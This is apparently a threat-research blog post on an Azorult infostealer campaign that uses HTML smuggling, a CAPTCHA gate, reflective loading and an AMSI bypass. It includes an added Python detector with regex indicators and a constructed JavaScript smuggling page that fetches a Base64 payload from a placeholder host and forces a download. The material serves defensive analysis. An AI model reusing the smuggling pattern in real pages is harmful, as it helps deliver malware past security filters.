Summary
Netskope Threat Labs has observed an evasive Azorult campaign in the wild that employs multiple defense evasion techniques from delivery through execution to fly under the defender’s radar as it steals sensitive data.
Azorult is an information stealer first discovered in 2016 that steals sensitive information including user credentials, browser information, and crypto wallet data. Azorult is on the rise and is currently one of the top malware families that Netskope Threat Labs has observed targeting the healthcare industry over the last year.
In this blog post, Netskope Threat Labs performs a detailed teardown of an evasive Azorult malware campaign we observed in the wild. This campaign is noteworthy for the following reasons:
- It delivers its initial payload through HTML smuggling, a detection evasion technique that is gaining popularity among adversaries. This defense evasion technique was also used by a nation-state group to smuggle a remote access trojan, and by Nokoyawa ransomware, where they started the infection process through HTML smuggling.
- It uses an unorthodox HTML smuggling technique where the malicious payload is embedded in a separate JSON file hosted on an external website.
- It executes the fileless Azorult infostealer stealthily by using reflective code loading, bypassing disk-based detection and minimizing artifacts.
- It uses an AMSI bypass technique to evade being detected by a variety of host-based anti-malware products, including Windows Defender.
- It steals sensitive data, including information for 137 distinct crypto wallets, login credentials, browser files, and important documents.
Google Sites serves as a decoy for HTML smuggling
HTML smuggling is a defense evasion technique that aims to bypass web controls that block risky file types. It abuses legitimate HTML5 download attributes and JavaScript blobs to construct malicious payloads on the client side, bypassing network security filters.
As part of Netskope Threat Labs’ threat hunting activities, we uncovered a campaign wherein an attacker created fake Google Docs pages on Google Sites from which they used HTML smuggling to download malicious payloads. They lure their victims to the fake Google Docs pages to trick them into believing the downloaded file was from Google Docs. In most cases that we see in the wild, the adversary embeds the smuggled malicious payload in the JavaScript itself. In this example, the adversary embedded the malicious payload in a separate JSON file as a Base64-encoded string. When the victim accesses the website, it sends a GET request to download the JSON file from a separate domain (mahmudiyeresort[.]com[.]tr) and extracts the payload from there.
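The two analyst steps this delivery pattern calls for are (1) statically recognising a page that assembles a download on the client side from an externally fetched JSON document, and (2) decoding that JSON to get the actual payload bytes for hashing and triage. The following Python is an added example written for this post, not code from Netskope or from the campaign; the HTML and JSON inputs are constructed placeholders (the host name, file names and payload bytes are invented), and the regex indicators are heuristics chosen here rather than a published signature.

```python
import base64
import hashlib
import json
import re

# Constructed sample: a minimal page in the shape described above. It fetches a JSON
# document from an external host, Base64-decodes a field, wraps it in a Blob and forces
# a download. The host name and file names are placeholders, not indicators from the post.
SAMPLE_HTML = """
<html><body><script>
fetch("https://example-external-host.invalid/data.json")
  .then(r => r.json())
  .then(j => {
    const bin = atob(j.payload);
    const bytes = Uint8Array.from(bin, c => c.charCodeAt(0));
    const blob = new Blob([bytes], {type: "application/octet-stream"});
    const a = document.createElement("a");
    a.href = URL.createObjectURL(blob);
    a.download = "document.zip";
    a.click();
  });
</script></body></html>
"""

# Constructed sample JSON carrying a Base64-encoded payload. The bytes are a harmless
# placeholder (a ZIP local-file-header signature followed by text), not real malware.
SAMPLE_JSON = json.dumps(
    {"payload": base64.b64encode(b"PK\x03\x04placeholder-payload").decode()}
)

# Static indicators of client-side payload assembly, as (name, regex) pairs.
INDICATORS = [
    ("fetch_external_json", re.compile(r"fetch\(\s*['\"]https?://[^'\"]+\.json['\"]", re.I)),
    ("base64_decode", re.compile(r"\batob\s*\(", re.I)),
    ("blob_construction", re.compile(r"new\s+Blob\s*\(", re.I)),
    ("object_url", re.compile(r"URL\.createObjectURL\s*\(", re.I)),
    ("download_attribute", re.compile(r"\.download\s*=|\bdownload\s*=\s*['\"]", re.I)),
    ("auto_click", re.compile(r"\.click\s*\(\s*\)", re.I)),
]


def score_html(html: str) -> dict:
    """Report which indicators fire and whether the page should be flagged.

    Flagging requires the core chain (Blob + object URL + forced download); the external
    JSON fetch and atob() raise the score but are common in benign pages on their own.
    """
    hits = {name: bool(rx.search(html)) for name, rx in INDICATORS}
    core = hits["blob_construction"] and hits["object_url"] and hits["download_attribute"]
    return {"hits": hits, "score": sum(hits.values()), "flagged": core}


def external_json_urls(html: str) -> list:
    """List the external JSON URLs the page fetches, so the payload can be retrieved."""
    return re.findall(r"fetch\(\s*['\"](https?://[^'\"]+\.json)['\"]", html, re.I)


def extract_payload(json_text: str, key: str = "payload") -> dict:
    """Decode the Base64 field from the smuggled JSON and describe the resulting bytes."""
    data = base64.b64decode(json.loads(json_text)[key])
    return {
        "size": len(data),
        "sha256": hashlib.sha256(data).hexdigest(),
        "magic": data[:4].hex(),
        "looks_like_zip": data.startswith(b"PK\x03\x04"),
    }


if __name__ == "__main__":
    report = score_html(SAMPLE_HTML)
    print("indicators:", report["hits"], "flagged:", report["flagged"])
    print("external JSON fetched:", external_json_urls(SAMPLE_HTML))
    print("decoded payload:", extract_payload(SAMPLE_JSON))
```

Because the payload never crosses the wire as a file, a proxy that only inspects downloaded file types sees an HTML page and a JSON document; the value of this check is that it runs on the HTML and JSON content themselves, and the SHA-256 it produces from the decoded bytes is what can be matched against threat intelligence.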
Smuggling With A Captcha
Usually, when a victim accesses a website that uses HTML smuggling to deliver malicious payloads, the payload is downloaded immediately. For this campaign, the attacker’s website hosted on Google Sites first presents a CAPTCHA, which serves as an additional layer of protection against URL scanners. This helps the HTML file remain undetected by public scanners like VirusTotal, which cannot proceed past the CAPTCHA.